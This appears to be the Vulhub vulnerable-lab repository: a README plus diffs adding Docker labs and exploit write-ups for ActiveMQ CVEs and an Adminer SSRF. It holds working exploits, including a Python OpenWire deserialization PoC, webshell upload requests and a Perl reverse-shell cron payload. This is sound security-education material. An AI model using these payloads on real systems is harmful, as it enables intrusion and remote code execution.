<img alt="GitHub language count" src="https://img.shields.io/github/languages/count/vulhub/vulhub?color=yellow">
<a href="https://github.com/vulhub/vulhub/graphs/contributors" target="_blank"><img alt="GitHub contributors" src="https://img.shields.io/github/contributors-anon/vulhub/vulhub?color=orange"></a>
<a href="https://github.com/vulhub/vulhub/blob/master/LICENSE" target="_blank"><img src="https://img.shields.io/github/license/vulhub/vulhub.svg" alt="GitHub"></a>
</p>
Vulhub是一个开源的、即开即用的漏洞靶场环境集合。无需Docker基础只需一条命令即可快速启动用于安全研究、学习或演示的漏洞环境。
## 快速开始
**安装Docker**以Ubuntu 22.04为例):
```bash
curl -s https://get.docker.com/ | sh
systemctl start docker
```
其他操作系统请参考[Docker官方文档](https://docs.docker.com/)。
虽然所有Vulhub环境都基于Docker compose制作但你不再需要安装独立的docker-compose而是使用Docker自带的compose命令来启动Vulhub环境。
**下载并解压Vulhub**
```bash
git clone --depth 1 https://github.com/vulhub/vulhub
```
**启动一个漏洞环境:**
```bash
cd vulhub/langflow/CVE-2025-3248 # Example: enter a vulnerability directory
docker compose up -d
```
每个环境目录下都包含详细的**README**,请参阅以了解复现步骤和使用说明。
**测试完成后清理环境:**
```bash
docker compose down -v
```
> [!NOTE]
>
> - 推荐使用至少1GB内存的VPS或虚拟机
> - 文档中的`your-ip`指你的主机/VPS IP不是Docker容器内部IP
> - 请确保Docker有权限访问当前目录下所有文件避免权限错误
> - Vulhub目前仅支持x86架构不支持ARM
> - **所有环境仅供测试与学习,严禁用于生产环境!**
## 贡献
如遇到编译或运行错误请优先排查Docker及相关依赖问题。如确认是Dockerfile或Vulhub代码问题请提交issue。常见问题可参考[FAQ](https://vulhub.org/documentation/faq)。
如有疑问,欢迎联系我们:
- [Discord](https://discord.gg/bQCpZEK)
- [Twitter](https://twitter.com/vulhub)
感谢所有[贡献者](contributors.md)
[![](https://opencollective.com/vulhub/contributors.svg?width=890&button=false)](https://github.com/vulhub/vulhub/graphs/contributors)
## 合作伙伴
我们的合作伙伴与用户:
<p>
<a href="https://www.wangan.com/vulhub" target="_blank"><img src="https://vulhub.org/sponsor/wangan.png" width="200"></a>
<a href="https://www.cvebase.com" target="_blank"><img src="https://vulhub.org/sponsor/cvebase.png" width="200"></a>
<a href="https://www.huoxian.cn" target="_blank"><img src="https://vulhub.org/sponsor/huoxian.png" width="200"></a>
<a href="https://www.chaitin.cn" target="_blank"><img src="https://vulhub.org/sponsor/chaitin.png" width="200"></a>
<a href="https://xianzhi.aliyun.com/" target="_blank"><img src="https://vulhub.org/sponsor/aliyun.svg" width="200"></a>
</p>
欢迎通过[GitHub Sponsor](https://github.com/sponsors/phith0n)、[OpenCollective](https://opencollective.com/vulhub#backer)或[Patreon](https://www.patreon.com/bePatron?u=12677520)支持Vulhub 🙏
<p>
<a href="https://github.com/sponsors/phith0n"><img src="https://opencollective.com/vulhub/backers.svg?width=138"></a>
<a href="https://github.com/sponsors/phith0n"><img src="https://opencollective.com/vulhub/sponsors.svg?width=138"></a>
</p>
更多[捐助方式](https://vulhub.org)。
## License
Vulhub 遵循 MIT License详见[LICENSE](LICENSE)。

BIN
activemq/CVE-2015-5254/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 54 KiB

BIN
activemq/CVE-2015-5254/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
activemq/CVE-2015-5254/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
activemq/CVE-2015-5254/4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 124 KiB

61
activemq/CVE-2015-5254/README.md Normal file
View File

@@ -0,0 +1,61 @@
# ActiveMQ Deserialization Vulnerability (CVE-2015-5254)
[中文版本(Chinese version)](README.zh-cn.md)
Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
Apache ActiveMQ version 5.x before the 5.13.0 security vulnerability, the vulnerability caused by the program does not limit the classes that can be serialized in the proxy. Remote attacker can make a special serialized Java Message Service (JMS) ObjectMessage objects exploit this vulnerability to execute arbitrary code.
Reference Links:
- https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf
## Vulnerability environment
Start the vulnerable environment:
```
docker compose up -d
```
After running the environment, it will establish two ports on port 61616 and 8161. Port 61616 is the working port, and messages are delivered on this port. Port 8161 is the webpage management page port. Access `http://your-ip:8161`, You can see the network management page, but this vulnerability does not require a network theoretically.
## Exploit
The exploit process is as follows:
1. Generate serialized payload (u can using ysoserial)
2. send payload to port 61616
3. Access the web management page and read the serialization messages, then u can trigger vulnerability.
To exploit this environment we will use [jmet](https://github.com/matthiaskaiser/jmet) (Java Message Exploitation Tool). First download the jar file of jmet, and create folder called **external** in the same directory (otherwise it may occur the error that the folder does not exist).
the jmet is to use ysoserial to generate Payload and send it (the jar comes with ysoserial, we don't no need to download it again), so we need to choose one that can be used in ysoserial as the gadget, such as ROME.
Execute:
```
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
```
![](1.png)
At this point, a queue named event will be added to the target ActiveMQ.
You can visit `http://your-ip:8161/admin/browse.jsp?JMSDestination=Event` to see all messages in this queue.
(**login / password:** admin/admin):
![](2.png)
Click this message to trigger the command execute, this time into the container `docker compose exec activemq bash`,
we can see /tmp/success has been successfully created, indicating exploit successful:
![](3.png)
Replace the command with a reverse shell statement and reuse it:
![](4.png)
It's worth noting that accessing messages through the web administration page and triggering the vulnerability requires administrator privileges. In the absence of password, we can induce administrator visit our link to trigger, or disguised as legitimate messages from other services need to wait for client access when triggered.

53
activemq/CVE-2015-5254/README.zh-cn.md Normal file
View File

@@ -0,0 +1,53 @@
# ActiveMQ 反序列化漏洞CVE-2015-5254
Apache ActiveMQ是美国阿帕奇Apache软件基金会所研发的一套开源的消息中间件它支持Java消息服务、集群、Spring Framework等。
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
参考链接:
- https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf
## 漏洞环境
运行漏洞环境:
```
docker compose up -d
```
环境运行后将监听61616和8161两个端口。其中61616是工作端口消息在这个端口进行传递8161是Web管理页面端口。访问`http://your-ip:8161`即可看到web管理页面不过这个漏洞理论上是不需要web的。
## 漏洞复现
漏洞利用过程如下:
1. 构造可以使用ysoserial可执行命令的序列化对象
2. 作为一个消息发送给目标61616端口
3. 访问web管理页面读取消息触发漏洞
使用[jmet](https://github.com/matthiaskaiser/jmet)进行漏洞利用。首先下载jmet的jar文件并在同目录下创建一个external文件夹否则可能会爆文件夹不存在的错误
jmet原理是使用ysoserial生成Payload并发送其jar内自带ysoserial无需再自己下载所以我们需要在ysoserial是gadget中选择一个可以使用的比如ROME。
执行:
```
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
```
![](1.png)
此时会给目标ActiveMQ添加一个名为event的队列我们可以通过`http://your-ip:8161/admin/browse.jsp?JMSDestination=event`看到这个队列中所有消息:
![](2.png)
点击查看这条消息即可触发命令执行,此时进入容器`docker compose exec activemq bash`,可见/tmp/success已成功创建说明漏洞利用成功
![](3.png)
将命令替换成弹shell语句再利用
![](4.png)
值得注意的是通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下我们可以诱导管理员访问我们的链接以触发或者伪装成其他合法服务需要的消息等待客户端访问的时候触发。

7
activemq/CVE-2015-5254/docker-compose.yml Normal file
View File

@@ -0,0 +1,7 @@
version: '2'
services:
activemq:
image: vulhub/activemq:5.11.1
ports:
- "61616:61616"
- "8161:8161"

BIN
activemq/CVE-2016-3088/01.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 19 KiB

BIN
activemq/CVE-2016-3088/02.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 77 KiB

BIN
activemq/CVE-2016-3088/03.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 48 KiB

124
activemq/CVE-2016-3088/README.md Normal file
View File

@@ -0,0 +1,124 @@
# ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
[中文版本(Chinese version)](README.zh-cn.md)
## Environment setup
Enter following commands to build and run the vulnerability environment:
```
docker compose up -d
```
The environment listens to port 61616 and port 8161, of which 8161 is the web console port. This vulnerability appears in the web console.
Visit `http://your-ip:8161/` to see the web page, indicating that the environment has been successfully run.
## Background brief
ActiveMQ web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, fileserver is the interface for storing files; admin and api need to log in before they can be used, fileserver does not need to log in.
fileserver is a RESTful API interface. We can read and write files stored in it through HTTP requests such as GET, PUT, and DELETE. The design purpose is to compensate for the defect that the message queue operation cannot transfer and store binary files, but later found that:
1. Its usage rate is not high
2. File operations are prone to vulnerabilities
Therefore, ActiveMQ has closed the fileserver application by default in 5.12.x~5.13.x (you can open it in conf/jetty.xml); after 5.14.0, the fileserver application is completely removed.
In the test process, you should pay attention to the version of ActiveMQ, prevent useless effort.
## Vulnerability Details
This vulnerability appears in the Fileserver application, the vulnerability principle is actually very simple, that is, fileserver support to write files (but do not parse the JSP), while supporting the move file (MOVE request). So, we just need to write a file and then move it to any location by use a move request, causing arbitrary file write vulnerability.
Write files such as cron or ssh key
1. Write Webshell
2. Write files such as cron or ssh key
3. Write libraries and configuration files such as jar or jetty.xml
The advantage of writing webshell is convenient, but the fileserver don't parse jsp, admin and api both need to log in to access, so it is a bit futile; The advantage of writing cron or ssh key is to directly reverse Shell, it is convenient too, the disadvantage is that you need root privileges; write jar, a little trouble (requires jar back door), write xml configuration file, this method is more reliable, but there is a futile point: we need to know ActiveMQ absolute path.
Let we talk about the above several methods.
### Write Webshell
As I said earlier, the Webshell needs to be written in the Admin or Api app, and both applications need to be logged in to access.
The default ActiveMQ account and password is `admin`. First, visit `http://your-ip:8161/admin/test/systemProperties.jsp` to view the absolute path of ActiveMQ:
![](02.png)
Then upload Webshell:
```
PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976
webshell...
```
Then move it to the API folder (`/opt/activemq/webapps/api/s.jsp`) in the Web directory:
```
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
```
Access Webshell (login required):
![](03.png)
### Write crontab, automate reverse shell
This is a relatively stable method. First upload the cron configuration file (note that the newline must be `\n`, not `\r\n`, otherwise the crontab execution will fail):
```
PUT /fileserver/1.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 248
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
Move it to `/etc/cron.d/root`:
```
MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
```
If both of the above requests return 204, the write is successful. Waiting for the reverse shell:
![](01.png)
This method requires the ActiveMQ run as root, otherwise it will not be able to write to the cron file.
### Write jetty.xml or jar
In theory we can override jetty.xml, remove the login restrictions for admin and api, and then write webshell.
In some cases, the owner of jetty.xml and jar is the user of the web container, so the success rate of writing crontab is higher.
Not tested yet.

127
activemq/CVE-2016-3088/README.zh-cn.md Normal file
View File

@@ -0,0 +1,127 @@
# ActiveMQ任意文件写入漏洞CVE-2016-3088
## 环境搭建
搭建及运行漏洞环境:
```
docker compose build
docker compose up -d
```
环境监听61616端口和8161端口其中8161为web控制台端口本漏洞就出现在web控制台中。
访问`http://your-ip:8161/`看到web页面说明环境已成功运行。
## 背景简述
ActiveMQ的web控制台分三个应用admin、api和fileserver其中admin是管理员页面api是接口fileserver是储存文件的接口admin和api都需要登录后才能使用fileserver无需登录。
fileserver是一个RESTful API接口我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷但后来发现
1. 其使用率并不高
2. 文件操作容易出现漏洞
所以ActiveMQ在5.12.x~5.13.x版本中已经默认关闭了fileserver这个应用你可以在conf/jetty.xml中开启之在5.14.0版本以后彻底删除了fileserver应用。
在测试过程中可以关注ActiveMQ的版本避免走弯路。
## 漏洞详情
本漏洞出现在fileserver应用中漏洞原理其实非常简单就是fileserver支持写入文件但不解析jsp同时支持移动文件MOVE请求。所以我们只需要写入一个文件然后使用MOVE请求将其移动到任意位置造成任意文件写入漏洞。
文件写入有几种利用方法:
1. 写入webshell
2. 写入cron或ssh key等文件
3. 写入jar或jetty.xml等库和配置文件
写入webshell的好处是门槛低更方便但前面也说了fileserver不解析jspadmin和api两个应用都需要登录才能访问所以有点鸡肋写入cron或ssh key好处是直接反弹拿shell也比较方便缺点是需要root权限写入jar稍微麻烦点需要jar的后门写入xml配置文件这个方法比较靠谱但有个鸡肋点是我们需要知道activemq的绝对路径。
分别说一下上述几种利用方法。
### 写入webshell
前面说了写入webshell需要写在admin或api应用中而这俩应用都需要登录才能访问。
默认的ActiveMQ账号密码均为`admin`,首先访问`http://your-ip:8161/admin/test/systemProperties.jsp`查看ActiveMQ的绝对路径
![](02.png)
然后上传webshell
```
PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976
webshell...
```
移动到web目录下的api文件夹`/opt/activemq/webapps/api/s.jsp`)中:
```
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
```
访问webshell需要登录
![](03.png)
### 写入crontab自动化弹shell
这是一个比较稳健的方法。首先上传cron配置文件注意换行一定要`\n`,不能是`\r\n`否则crontab执行会失败
```
PUT /fileserver/1.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 248
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
将其移动到`/etc/cron.d/root`
```
MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
```
如果上述两个请求都返回204了说明写入成功。等待反弹shell
![](01.png)
这个方法需要ActiveMQ是root运行否则也不能写入cron文件。
### 写入jetty.xml或jar
理论上我们可以覆盖jetty.xml将admin和api的登录限制去掉然后再写入webshell。
有的情况下jetty.xml和jar的所有人是web容器的用户所以相比起来写入crontab成功率更高一点。
尚未测试。

7
activemq/CVE-2016-3088/docker-compose.yml Normal file
View File

@@ -0,0 +1,7 @@
version: '2'
services:
activemq:
image: vulhub/activemq:5.11.1-with-cron
ports:
- "61616:61616"
- "8161:8161"

BIN
activemq/CVE-2022-41678/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 249 KiB

BIN
activemq/CVE-2022-41678/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 40 KiB

BIN
activemq/CVE-2022-41678/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 155 KiB

BIN
activemq/CVE-2022-41678/4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 34 KiB

BIN
activemq/CVE-2022-41678/5.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 212 KiB

83
activemq/CVE-2022-41678/README.md Normal file
View File

@@ -0,0 +1,83 @@
# Apache ActiveMQ Jolokia Authenticated Remote Code Execution (CVE-2022-41678)
[中文版本(Chinese version)](README.zh-cn.md)
Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
Apache ActiveMQ prior to 5.16.5, 5.17.3, there is a authenticated RCE exists in the Jolokia `/api/jolokia`.
References:
- <https://activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt>
- <https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/>
## Vulnerable Environment
Execute following command to start a Apache ActiveMQ 5.17.3:
```
docker compose up -d
```
After server is started, open the `http://your-ip:8161/` and input username and password with `admin` and `admin`. Then you will see the index page of Apache ActiveMQ.
## Exploit
Firstly, listing all avaiable MBeans in Apache ActiveMQ by `/api/jolokia/list`:
```
GET /api/jolokia/list HTTP/1.1
Host: localhost:8161
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Origin: http://localhost
```
![](1.png)
There are 2 exploitable MBeans that are able to perform RCE in this list.
## Method #1
The first one is using the `org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean`, a MBean provided by Log4j2.
Attacker can use this MBean to update the Log4j configuration and write logs to arbitrary directories.
I prepared a [poc](poc.py) to reproduce the whole process:
```
python poc.py -u admin -p admin http://your-ip:8161
```
![](2.png)
Webshell is written to `/admin/shell.jsp` successfully:
![](3.png)
This method is limited by version of ActiveMQ, since Log4j2 was introduced in Apache ActiveMQ 5.17.0.
## Method #2
The second one is using the `jdk.management.jfr.FlightRecorderMXBean` MBean.
FlightRecorder was introduced in OpenJDK 11, users are able to use FlightRecorderMXBean to create record and save it to a file. This feature is also can be used to write webshell.
Use [poc](poc.py) to reproduce the whole process:
```
python poc.py -u admin -p admin --exploit jfr http://localhost:8161
```
![](4.png)
Webshell is written to `/admin/shelljfr.jsp` successfully:
![](5.png)

81
activemq/CVE-2022-41678/README.zh-cn.md Normal file
View File

@@ -0,0 +1,81 @@
# Apache ActiveMQ Jolokia 后台远程代码执行漏洞CVE-2022-41678
Apache ActiveMQ 是美国阿帕奇Apache软件基金会所研发的一套开源的消息中间件它支持Java消息服务、集群、Spring Framework等。
Apache ActiveMQ 在5.16.5, 5.17.3版本及以前后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。
参考链接:
- <https://activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt>
- <https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/>
## 漏洞环境
执行如下命令启动一个Apache ActiveMQ 5.17.3服务器:
```
docker compose up -d
```
服务启动后,访问`http://your-ip:8161/`后输入账号密码`admin``admin`,即可成功登录后台。
## 漏洞复现
首先,访问`/api/jolokia/list`这个API可以查看当前服务器里所有的MBeans
```
GET /api/jolokia/list HTTP/1.1
Host: localhost:8161
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Origin: http://localhost
```
![](1.png)
这其中有两个可以被用来执行任意代码。
## 方法1
第一个方法是使用`org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean`这是由Log4j2提供的一个MBean。
攻击者使用这个MBean中的`setConfigText`操作可以更改Log4j的配置进而将日志文件写入任意目录中。
使用[poc](poc.py)脚本来复现完整的过程:
```
python poc.py -u admin -p admin http://your-ip:8161
```
![](2.png)
Webshell被写入在`/admin/shell.jsp`文件中:
![](3.png)
这个方法受到ActiveMQ版本的限制因为Log4j2是在5.17.0中才引入Apache ActiveMQ。
## 方法2
第二个可利用的Mbean是`jdk.management.jfr.FlightRecorderMXBean`
FlightRecorder是在OpenJDK 11中引入的特性被用于记录Java虚拟机的运行事件。利用这个功能攻击者可以将事件日志写入任意文件。
使用[poc](poc.py)脚本来复现完整的过程(使用`--exploit`参数指定使用的方法):
```
python poc.py -u admin -p admin --exploit jfr http://localhost:8161
```
![](4.png)
Webshell被写入在`/admin/shelljfr.jsp`文件中:
![](5.png)

8
activemq/CVE-2022-41678/docker-compose.yml Normal file
View File

@@ -0,0 +1,8 @@
version: '2'
services:
activemq:
image: vulhub/activemq:5.17.3
ports:
- "61616:61616"
- "8161:8161"
- "5005:5005"

1076
activemq/CVE-2022-41678/poc.py Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
activemq/CVE-2023-46604/01.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 17 KiB

57
activemq/CVE-2023-46604/README.md Normal file
View File

@@ -0,0 +1,57 @@
# Apache ActiveMQ OpenWire Protocol Deserialization RCE (CVE-2023-46604)
[中文版本(Chinese version)](README.zh-cn.md)
Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
OpenWire protocol is designed by ActiveMQ, to allow native access to ActiveMQ from a number of different languages and platforms. Apache ActiveMQ prior to 5.18.2 was affected by a deserialization vulnerability. This vulnerability may allow remote attackers with network access privileges to execute arbitrary shell commands by manipulating the serialized class types in the OpenWire protocol, leading to the instantiation of any class on the classpath of the agent.
References:
- <https://activemq.apache.org/news/cve-2023-46604>
- <https://xz.aliyun.com/t/12929>
- <https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/>
- <https://forum.butian.net/share/2566>
## Environment setup
ActiveMQ listens to following 2 ports:
| Default port | Default Condition |
|--------------|--------------------------------------|
| 8161 (web) | Remote access requires configuration |
| 61616 (tcp) | Remote access allowed |
The deserialization issue exists in the port 61616.
Enter following commands to run a ActiveMQ 5.17.3 server:
```
docker compose up -d
```
Please access `http://your-ip:8161` to confirm that the service has started successfully before exploitation, although we only need to use the port 61616 after that.
## Exploit
You can quickly start an HTTP server in the folder where the [poc.xml](poc.xml) file is located using the Python3 http.server module:
```shell
python3 -m http.server 6666
```
Then execute the [poc.py](poc.py):
```shell
python3 poc.py target port http://ip of http server/poc.xml
```
You can check inside the ActiveMQ container using the following command:
```
docker exec cve-2023-46604-activemq-1 ls -l /tmp
```
If you see the output showing that touch /tmp/activeMQ-RCE-success has been executed successfully, then the exploit has worked.
![01.png](01.png)

55
activemq/CVE-2023-46604/README.zh-cn.md Normal file
View File

@@ -0,0 +1,55 @@
# Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞CVE-2023-46604
Apache ActiveMQ 是美国阿帕奇Apache软件基金会所研发的一套开源的消息中间件它支持Java消息服务、集群、Spring Framework等。
OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActiveMQ 5.18.2版本及以前OpenWire协议通信过程中存在一处反序列化漏洞该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
参考链接:
- <https://activemq.apache.org/news/cve-2023-46604>
- <https://xz.aliyun.com/t/12929>
- <https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/>
- <https://forum.butian.net/share/2566>
## 环境搭建
ActiveMQ运行后默认监听如下两个端口
| 默认端口 | 默认条件 |
|-----------|-----------|
| 8161 web | 需配置才可远程访问 |
| 61616 tcp | 远程访问 |
反序列化漏洞出现在61616端口中。
执行如下命令启动一个ActiveMQ 5.17.3版本服务器:
```
docker compose up -d
```
服务启动后,访问`http://your-ip:8161`检查服务是否运行成功。但实际上利用该漏洞并不需要能够访问8161端口。
## 漏洞复现
首先启动一个HTTP反连服务器其中包含我们的[poc.xml](poc.xml)
```shell
python3 -m http.server 6666
```
然后,执行[poc.py](poc.py)传入的三个参数分别是目标服务器地址、端口以及包含poc.xml的反连平台URL
```shell
python3 poc.py target port http://ip of http server/poc.xml
```
执行完成后进入ActiveMQ容器
```
docker exec cve-2023-46604-activemq-1 ls -l /tmp
```
可见,`touch /tmp/activeMQ-RCE-success`已经被成功执行:
![01.png](01.png)

8
activemq/CVE-2023-46604/docker-compose.yml Normal file
View File

@@ -0,0 +1,8 @@
version: '2'
services:
activemq:
image: vulhub/activemq:5.17.3
ports:
- "61616:61616"
- "8161:8161"
- "5005:5005"

36
activemq/CVE-2023-46604/poc.py Normal file
View File

@@ -0,0 +1,36 @@
import io
import socket
import sys
def main(ip, port, xml):
classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_obj.connect((ip, port))
with socket_obj:
out = socket_obj.makefile('wb')
# out = io.BytesIO() # 创建一个内存中的二进制流
out.write(int(32).to_bytes(4, 'big'))
out.write(bytes([31]))
out.write(int(1).to_bytes(4, 'big'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(int(1).to_bytes(4, 'big'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(len(classname).to_bytes(2, 'big'))
out.write(classname.encode('utf-8'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(len(xml).to_bytes(2, 'big'))
out.write(xml.encode('utf-8'))
# print(list(out.getvalue()))
out.flush()
out.close()
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
"http://192.168.0.101:8888/poc.xml")
exit(-1)
main(sys.argv[1], int(sys.argv[2]), sys.argv[3])

14
activemq/CVE-2023-46604/poc.xml Normal file
View File

@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>touch</value>
<value>/tmp/activeMQ-RCE-success</value>
</list>
</constructor-arg>
</bean>
</beans>

BIN
adminer/CVE-2021-21311/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 45 KiB

29
adminer/CVE-2021-21311/README.md Normal file
View File

@@ -0,0 +1,29 @@
# Adminer Server-side Request Forgery on Error Page of Elasticsearch and ClickHouse (CVE-2021-21311)
[中文版本(Chinese version)](README.zh-cn.md)
Adminer is a tool for managing content in databases developed by PHP. It natively supports MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch and MongoDB.
In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability on error page of Elasticsearch and ClickHouse. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
References:
- <https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6>
- <https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf>
- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml>
## Vulnerable environment
Execute following command to start a PHP server with Adminer 4.7.8:
```
docker compose up -d
```
After the server is started, you can see the login page of Adminer at `http://your-ip:8080`.
## Exploit
Select the ElasticSearch as the system field, then input `example.com` into the server field. Click the login button, you will see the 400 response from `example.com`:
![](1.png)

27
adminer/CVE-2021-21311/README.zh-cn.md Normal file
View File

@@ -0,0 +1,27 @@
# Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞CVE-2021-21311
Adminer是一个PHP编写的开源数据库管理工具支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。
